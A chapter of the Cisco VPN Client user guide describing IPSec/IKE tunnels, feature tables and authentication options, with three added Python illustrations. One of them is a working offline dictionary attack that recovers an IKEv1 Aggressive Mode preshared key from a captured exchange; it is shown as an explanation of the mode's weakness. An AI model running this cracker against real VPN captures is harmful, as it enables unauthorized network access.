Table of Contents
Understanding the Cisco VPN Client
How the VPN Client Works
VPN Client Features
Understanding the Cisco VPN Client
The Cisco VPN Client for Windows (referred to in this user guide as VPN Client) is software that runs on a Microsoft® Windows®-based PC. The VPN Client on a remote PC, communicating with a Cisco Easy VPN server on an enterprise network or with a service provider, creates a secure connection over the Internet. Through this connection you can access a private network as if you were an on-site user. Thus you have a Virtual Private Network (VPN). The server verifies that incoming connections have up-to-date policies in place before establishing them. Cisco IOS, VPN 3000 Series Concentrators, and PIX central-site servers can all terminate VPN connections from VPN Clients.
As a remote user, over a low-speed or high-speed link, you first connect to the Internet. Then you use the VPN Client to securely access private enterprise networks through a Cisco VPN server that supports the VPN Client.
The VPN Client comprises the following applications, which you select from the Programs menu:
Figure 1-1 VPN Client Applications as Installed by the InstallShield Wizard
The applications are as follows:
- Help: Displays an online manual with instructions on using the applications.
- SetMTU: Lets you manually change the size of the maximum transmission unit (see the VPN Client Administrator Guide, Chapter 6).
- VPN Client: Lets you configure connections to a VPN server, start connections, enroll for certificates to authenticate connections to VPN servers, and display events from the log.
- Uninstall VPN Client: Lets you safely remove the VPN Client software from your system while retaining your connection and certificate configurations.
Note: You can install the VPN Client through either the InstallShield wizard or the Microsoft Installer. If you install the VPN Client through the Microsoft Installer, the Programs menu shown in Figure 1-1 does not contain the Uninstall application.
How the VPN Client Works
The VPN Client works with a Cisco VPN server to create a secure connection, called a tunnel, between your computer and the private network. It uses the Internet Key Exchange (IKE) protocol to negotiate and manage the connection and Internet Protocol Security (IPSec) to protect the traffic that passes through it. Some of the steps include:
- Negotiating tunnel parameters: addresses, algorithms, lifetime, and so on.
- Establishing tunnels according to the parameters.
- Authenticating users: making sure users are who they say they are, by way of usernames, group names and passwords, and X.509 digital certificates.
- Establishing user access rights: hours of access, connection time, allowed destinations, allowed protocols, and so on.
- Managing security keys for encryption and decryption.
- Authenticating, encrypting, and decrypting data through the tunnel.
For example, to use a remote PC to read e-mail at your organization, you connect to the Internet, then start the VPN Client and establish a secure connection through the Internet to your organization's private network. When you open your e-mail, the Cisco VPN server uses IPSec to encrypt the e-mail message. It then transmits the message through the tunnel to your VPN Client, which decrypts the message so you can read it on your remote PC. If you reply to the e-mail message, the VPN Client uses IPSec to process and return the message to the private network through the Cisco VPN server.
Connection Technologies
The VPN Client lets you use any of the following technologies to connect to the Internet:
- POTS (Plain Old Telephone Service): Uses a dial-up modem to connect.
- ISDN (Integrated Services Digital Network): May use a dial-up modem or terminal adapter to connect.
- Cable: Uses a cable modem; always connected.
- DSL (Digital Subscriber Line): Uses a DSL modem; always connected.
You can also use the VPN Client on a PC with a direct LAN connection.
VPN Client Features
The tables in the following sections describe the VPN Client features.
Table 1-1 lists the VPN Client main features.
Table 1-1 VPN Client Main Features
| Feature | Description |
|---|---|
| Operating system | Windows 98, Windows NT, Windows ME, Windows 2000, Windows XP |
| Connection types | Async serial PPP; Internet-attached Ethernet |
| Protocol | IP |
| Tunnel protocol | IPSec |
| User authentication | RADIUS; RSA SecurID; VPN server internal user list; PKI digital certificates; smart cards; NT Domain (Windows NT) |
Program Features
The VPN Client supports the program features listed in Table 1-2.
Table 1-2 Program Features
| Program Feature | Description |
|---|---|
| On-line Help | Complete browser-based context-sensitive Help |
| Servers supported | Cisco IOS devices that support Easy VPN server functionality; VPN 3000 Series Concentrators; Cisco PIX Firewall Series, Version 6.2 or later |
| Interfaces supported | Graphical user interface; command line interface |
| Local LAN access | The ability to access resources on the local LAN while connected through a secure gateway to a central-site VPN server, but only if the central site grants permission. |
| Automatic VPN Client configuration option | The ability to import a configuration file. |
| Event logging | The VPN Client log collects events for viewing and analysis. |
| NAT Transparency (NAT-T) | Lets the VPN Client and the VPN device automatically detect when to encapsulate IPSec in UDP so that the tunnel works through Port Address Translation (PAT) devices. |
| Update of centrally controlled backup server list | The VPN Client learns the backup VPN server list when the connection is established. This feature is configured on the VPN device and pushed to the VPN Client. The backup servers for each connection entry are listed on the Backup Servers tab. |
| Set MTU size | The VPN Client automatically sets a maximum transmission unit (MTU) size that is optimal for your environment. You can also set the MTU size manually; for information on adjusting it, see the VPN Client Administrator Guide. |
| Support for Dynamic DNS (DDNS hostname population) | The VPN Client sends its hostname to the VPN device when the connection is established. The VPN device can then include that hostname in its DHCP request, so that the DNS server updates its database with the new hostname and the address assigned to the VPN Client. |
| Application Launcher | The ability to launch an application or a third-party dialer from the VPN Client. |
| Uninstall package (InstallShield) | Automatic uninstall of the 5000 VPN Client software with the InstallShield installation package. |
| Automatic dialup connection | Automatic connection by way of Microsoft Dial-Up Networking or any other third-party remote-access dialer. |
| Notifications | Software update notifications from the VPN server upon connection. |
| Launching from notification | Ability to launch a site containing upgrade software from a VPN server notification. |
| Auto initiation | The ability to initiate a secure VPN connection automatically, for example when the PC joins a wireless network. |
| Virtual adapter | Available on Windows 2000 and Windows XP, this software-only driver presents itself to the system as a valid network interface in order to solve application incompatibility problems. |
| Alerts (Delete with reason) | The VPN Client can display to the user the reason for a VPN 3000 Concentrator-initiated disconnection, if that information is available. If the VPN 3000 Concentrator (Release 4.0) disconnects the VPN Client and tears down the tunnel, the VPN Client displays a pop-up window showing the reason for the disconnect and also logs a message to the Notifications log and the IPSec log file. For IPSec deletes that do not tear down the connection, an event message appears only in the log file. |
| Single-SA | The ability to use a single security association (SA) per VPN connection. Rather than creating a host-to-network SA pair for each split-tunneling network, this feature takes a host-to-ALL approach, creating one tunnel for all appropriate network traffic regardless of whether split tunneling is in use. |
| Coexistence with third-party client software | Compatibility with Microsoft, Nortel, Check Point, Intel, and other VPN clients: other VPN products can remain installed alongside the VPN Client. This does not mean the clients can hold connections simultaneously; only one can be connected at a time. |
Authentication Features
The VPN Client supports the authentication features listed in Table 1-3.
Table 1-3 Authentication Features
| Authentication Feature | Description |
|---|---|
| User authentication through VPN central-site device | Internal, through the VPN device's database; RADIUS (Remote Authentication Dial-In User Service); NT Domain (Windows NT); RSA (formerly SDI) SecurID or SoftID |
| Certificate Authorities (CAs) | CAs that support PKI SCEP enrollment. |
| Entrust Entelligence | Ability to use Entrust Entelligence certificates. |
| Certificate management | Allows you to manage the certificates in the certificate stores. |
| Smart cards | Ability to authenticate using smart cards that hold certificates. |
| Peer Certificate Distinguished Name Verification | Prevents the VPN Client from connecting to a rogue gateway that presents a stolen but valid certificate from a hijacked IP address. The VPN Client compares the distinguished name (DN) in the peer's certificate with the DN it expects for the connection; if that verification fails, the connection fails even though the certificate itself is valid. |
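The check described under Peer Certificate Distinguished Name Verification, as an added Python example rather than the VPN Client's own code: the gateway's certificate must pass the ordinary PKI checks, and its subject DN must equal the DN expected for the connection, so a certificate that is valid but was issued to some other subject is rejected. The DN strings, addresses and the `PeerHello` model are constructed for this example, and exact ordered matching of the full DN is an assumption of the example, not a documented Cisco rule.

```python
"""Peer certificate distinguished-name (DN) check (illustrative, not Cisco code).

A gateway presenting a certificate that chains to a trusted CA and is unexpired
but was issued to another subject is still rejected, because its subject DN does
not match the DN the connection entry expects.  All DN strings are constructed.
"""
from dataclasses import dataclass
from typing import List, Tuple


def parse_dn(dn: str) -> List[Tuple[str, str]]:
    """Split a textual DN such as 'CN=vpn.corp.example, O=Corp, C=US' into
    (type, value) pairs.  Backslash-escaped commas inside a value are kept.
    Types are upper-cased and values are whitespace-normalised and case-folded so
    cosmetic differences in how a tool prints the DN do not matter."""
    parts, cur, escaped = [], [], False
    for ch in dn:
        if escaped:
            cur.append(ch)
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == ",":
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    pairs = []
    for part in parts:
        if "=" not in part:
            raise ValueError(f"malformed RDN: {part!r}")
        typ, val = part.split("=", 1)
        pairs.append((typ.strip().upper(), " ".join(val.split()).casefold()))
    return pairs


def dn_matches(presented: str, expected: str) -> bool:
    """Exact, order-sensitive comparison of two DNs after normalisation (assumption)."""
    return parse_dn(presented) == parse_dn(expected)


@dataclass
class PeerHello:
    """What the client learns about the gateway during IKE (constructed model)."""
    ip: str
    cert_subject: str
    cert_chain_valid: bool  # outcome of the ordinary PKI checks: trust, expiry, revocation


def accept_gateway(peer: PeerHello, expected_dn: str) -> str:
    """Return 'accept' or a 'reject: ...' reason.  Both checks must pass."""
    if not peer.cert_chain_valid:
        return "reject: certificate failed PKI validation"
    if not dn_matches(peer.cert_subject, expected_dn):
        return "reject: peer DN mismatch"
    return "accept"


# Hypothetical DN configured for the connection entry.
EXPECTED_DN = "CN=vpn.corporate.example, OU=Network, O=Corporate, C=US"

if __name__ == "__main__":
    genuine = PeerHello("198.51.100.10", EXPECTED_DN, True)
    # A valid certificate stolen from another host, presented from a hijacked address.
    rogue = PeerHello("198.51.100.10", "CN=vpn.other.example, O=Other Co\\, Inc, C=US", True)
    for peer in (genuine, rogue):
        print(peer.ip, repr(peer.cert_subject), "->", accept_gateway(peer, EXPECTED_DN))
```

The order of the two checks matters: PKI validation first, so that an attacker cannot learn the expected DN by probing with self-signed certificates, then the DN comparison, which is what defeats a stolen-but-valid certificate.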
Firewall Features
The VPN Client supports the firewall features listed in Table 1-4.
Table 1-4 Firewall Features
| Firewall Feature | Description |
|---|---|
| Support for firewalls | Cisco Integrated Firewall; Cisco Intrusion Prevention Security Agent; ZoneAlarmPro 2.6.3.57 and higher; ZoneAlarm 2.6.3.57 and higher; ZoneLabs Integrity 1.0 and higher; BlackIce Agent and BlackIce Defender 2.5 and higher; Sygate Personal Firewall and Sygate Personal Firewall Pro, Version 5.0, Build 1175 and higher |
| Centralized Protection Policy | Support for firewall policies pushed to the VPN Client from a VPN Concentrator |
| Stateful Firewall | Can be enabled or disabled from the command line |
| ICMP permission | Configurable on the VPN Client |
IPSec Features
The VPN Client supports the IPSec features listed in Table 1-5.
Table 1-5 IPSec Features
| IPSec Feature | Description |
|---|---|
| Tunnel protocol | IPSec |
| Transparent tunneling | IPSec over UDP for NAT and PAT; IPSec over TCP for NAT, PAT, and firewalls |
| Key management protocol | Internet Key Exchange (IKE) |
| IKE keepalives | A mechanism for monitoring the continued presence of the peer and reporting the VPN Client's own continued presence to it. This lets the VPN Client notify you when the peer is no longer reachable. A second type of keepalive keeps NAT port mappings alive. |
| Split tunneling | The ability to send some packets over the Internet in clear text while sending others encrypted through the IPSec tunnel. The VPN device supplies the VPN Client with the list of networks whose traffic is tunneled; you enable split tunneling and configure that network list on the VPN device. While split tunneling is in effect, traffic to destinations outside the list is not protected by the tunnel. |
| Support for Split DNS | The ability to send DNS queries in clear text over the Internet to an external DNS server (the one serving your ISP) for the domains it serves, or through the IPSec tunnel to the corporate DNS server for the domains it serves. The VPN server supplies the VPN Client with the list of domains whose queries are tunneled into the private network. For example, a query for a name in corporate.com goes through the tunnel to the DNS server that serves the private network, while a query for a name in myfavoritesearch.com is handled by the ISP's DNS server. This feature is configured on the VPN server (VPN concentrator) and is enabled on the VPN Client by default. To use Split DNS, you must also have split tunneling configured. |
| LZS data compression | A feature that benefits modem users. |
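The two decisions described in the split tunneling and Split DNS rows, as an added Python example that is not code from the Cisco VPN Client: a destination address is tunneled only if it falls inside a network on the pushed list, and a DNS query is tunneled only if the name falls under a domain on the pushed list. The network list, domain list, addresses and names are constructed for the example; the label-boundary rule for domain matching (so that `fakecorporate.com` does not match `corporate.com`) is an assumption about how a suffix list should be applied, not a documented Cisco behaviour.

```python
"""Split-tunneling and split-DNS routing decisions, modelled in Python.

Added illustration, not Cisco VPN Client code.  The VPN device pushes two lists
to the client when the tunnel comes up: the networks whose traffic is tunneled
and the DNS domains whose queries are tunneled.  Everything else leaves the PC
in clear text via the ISP path.  The lists, addresses and names are constructed.
"""
import ipaddress

# Constructed policy as it might be pushed by the VPN device (hypothetical values).
TUNNELED_NETWORKS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.100.0/24")]
TUNNELED_DOMAINS = ("corporate.com",)


def route_for_packet(dst: str, split_tunneling: bool) -> str:
    """Return 'tunnel' or 'clear' for a destination address.

    With split tunneling disabled every packet is encrypted into the tunnel.
    With it enabled, only destinations inside a pushed network are tunneled;
    anything else, local LAN and Internet alike, goes out unprotected.
    """
    if not split_tunneling:
        return "tunnel"
    addr = ipaddress.ip_address(dst)
    return "tunnel" if any(addr in net for net in TUNNELED_NETWORKS) else "clear"


def _in_domain(qname: str, domain: str) -> bool:
    """Label-boundary suffix match (assumption): 'mail.corporate.com' is in
    'corporate.com', 'fakecorporate.com' is not.  Trailing dots and case are ignored."""
    q = qname.rstrip(".").lower()
    d = domain.rstrip(".").lower()
    return q == d or q.endswith("." + d)


def resolver_for_query(qname: str, split_tunneling: bool) -> str:
    """Return 'corporate' (query goes through the tunnel to the private DNS)
    or 'isp' (query goes in clear text to the ISP's resolver).

    Split DNS requires split tunneling: without it all traffic, DNS included,
    is tunneled, so every query reaches the corporate resolver.
    """
    if not split_tunneling:
        return "corporate"
    return "corporate" if any(_in_domain(qname, d) for d in TUNNELED_DOMAINS) else "isp"


def decide(dst: str, qname: str, split_tunneling: bool) -> dict:
    """Combine both decisions for one name lookup plus one data packet."""
    return {
        "dns": resolver_for_query(qname, split_tunneling),
        "data": route_for_packet(dst, split_tunneling),
    }


if __name__ == "__main__":
    for dst, name in (("10.1.2.3", "mail.corporate.com"),
                      ("203.0.113.9", "myfavoritesearch.com"),
                      ("203.0.113.9", "fakecorporate.com")):
        print(dst, name, decide(dst, name, split_tunneling=True))
```

Running the sample shows the point of the "split tunneling required" prerequisite: with `split_tunneling=False` both functions answer "tunnel"/"corporate" regardless of the lists, because there is no clear-text path for anything to take.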
VPN Client IPSec Attributes
The VPN Client supports the IPSec attributes listed in Table 1-6.
Table 1-6 IPSec Attributes
| IPSec Attribute | Description |
|---|---|
| Main Mode and Aggressive Mode | The two ways of negotiating phase 1, which establishes the ISAKMP Security Association (SA). In Aggressive Mode with preshared keys, the identities and the responder's authentication hash travel in the clear, so a captured exchange can be used to guess the preshared key offline; Main Mode or certificate authentication avoids this exposure. |
| Authentication algorithms | HMAC (Hash-based Message Authentication Code) with the MD5 (Message Digest 5) hash function; HMAC with the SHA-1 (Secure Hash Algorithm 1) hash function |
| Authentication modes | Preshared keys; X.509 digital certificates |
| Diffie-Hellman groups | |
| Encryption algorithms | 56-bit DES (Data Encryption Standard); 168-bit Triple-DES; AES with 128-bit and 256-bit keys. 56-bit DES is no longer considered strong; prefer Triple-DES or AES where the VPN device allows it. |
| Extended Authentication (XAUTH) | The capability of authenticating a user within IKE. This authentication is in addition to the normal IKE phase 1 authentication, in which the IPSec devices authenticate each other; the extended authentication exchange does not replace that device authentication. |
| Mode Configuration | Also known as ISAKMP Configuration Method: the exchange through which the VPN device assigns the VPN Client its private-network address and pushes connection parameters to it. |
| Tunnel encapsulation modes | IPSec over UDP (NAT/PAT); IPSec over TCP (NAT/PAT); IPSec over NAT-T |
| IP compression (IPCOMP) using LZS | Data compression algorithm |
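Why the Main Mode versus Aggressive Mode choice matters when preshared keys are in use, as an added Python example, not Cisco code. It computes HASH_R the way RFC 2409 defines it for preshared-key authentication, with HMAC-SHA1 as the prf, and then shows that an observer who captured an Aggressive Mode exchange, in which HASH_R and all of its inputs are sent unencrypted, can recover the key by an offline dictionary search. All exchange values (cookies, nonces, Diffie-Hellman public values, SA body, identity) are constructed constants, not a real capture, and the candidate key list is made up for the example.

```python
"""Offline preshared-key recovery from an IKEv1 Aggressive Mode exchange.

Added example, not Cisco code.  RFC 2409 defines, for preshared-key auth:
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
In Main Mode HASH_R is carried inside the encrypted phase 1 messages.  In
Aggressive Mode it is sent in the clear in message 2, and every other input is
also visible on the wire, so PSK guesses can be tested offline.  The prf is
HMAC-SHA1 here; all exchange values are constructed constants, not a capture.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKE prf, negotiated here as HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def hash_r(psk: bytes, ex: dict) -> bytes:
    """Responder authentication hash as RFC 2409 section 5.4 defines it for PSK auth."""
    skeyid = prf(psk, ex["ni"] + ex["nr"])
    return prf(skeyid, ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
               + ex["sai_b"] + ex["idir_b"])


def capture_exchange(psk: bytes) -> dict:
    """Model what an on-path observer sees in an Aggressive Mode exchange.
    Only the PSK is secret; everything in the returned dict is on the wire.
    Values are constructed, not taken from real traffic."""
    ex = {
        "cky_i": bytes.fromhex("0102030405060708"),   # initiator cookie
        "cky_r": bytes.fromhex("1112131415161718"),   # responder cookie
        "ni": b"\x01" * 20,                            # initiator nonce
        "nr": b"\x02" * 20,                            # responder nonce
        "gxi": b"\x03" * 128,                          # initiator DH public value
        "gxr": b"\x04" * 128,                          # responder DH public value
        "sai_b": bytes.fromhex("0000000100000001"),    # SA payload body (abbreviated)
        # ID payload body: ID_IPV4_ADDR (type 1), protocol 0, port 0, then the address
        "idir_b": b"\x01\x00\x00\x00" + bytes([198, 51, 100, 10]),
    }
    ex["hash_r"] = hash_r(psk, ex)  # sent unencrypted by the responder
    return ex


def crack_psk(ex: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute HASH_R for each guess and compare."""
    for guess in wordlist:
        if hmac.compare_digest(hash_r(guess.encode(), ex), ex["hash_r"]):
            return guess
    return None


if __name__ == "__main__":
    captured = capture_exchange(b"cisco123")          # the observer never sees this argument
    candidates = ["password", "letmein", "cisco123", "qwerty"]  # made-up wordlist
    print("recovered PSK:", crack_psk(captured, candidates))
```

Nothing here breaks IKE itself; the weakness is that Aggressive Mode turns the preshared key into something that can be attacked at dictionary speed from a single passive capture, so key quality is the only defence. In Main Mode the same hash is sent inside the encrypted fifth and sixth messages, and with certificate authentication there is no shared secret to guess.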
Windows Features Supported
The VPN Client supports the Windows NT, Windows 2000, and Windows XP features listed in Table 1-7.
Table 1-7 Windows NT Features
| Windows NT Feature | Description |
|---|---|
| Password expiration information | Password expiration information when authenticating through a RADIUS server that references an NT user database. When you log in, the VPN Concentrator sends a message that your password has expired and asks you to enter a new one and then confirm it. On pre-Release 3.5 VPN Clients the prompt asks you to supply a PIN and to verify it; on a Release 3.5 or later VPN Client the prompt asks you to enter and verify a password. |
| Start before logon | The ability to establish a VPN connection before logging on to a Windows NT platform, meaning Windows NT 4.0, Windows 2000, or Windows XP. |
| Automatic VPN disconnect on logoff | The ability to enable or disable automatic disconnection of the VPN when you log off a Windows NT platform. Disabling this feature allows roaming profile synchronization to complete at logoff. |
Posted: Tue Apr 8 09:33:43 PDT 2003
All contents are Copyright © 1992--2002 Cisco Systems, Inc. All rights reserved.
Important Notices and Privacy Statement.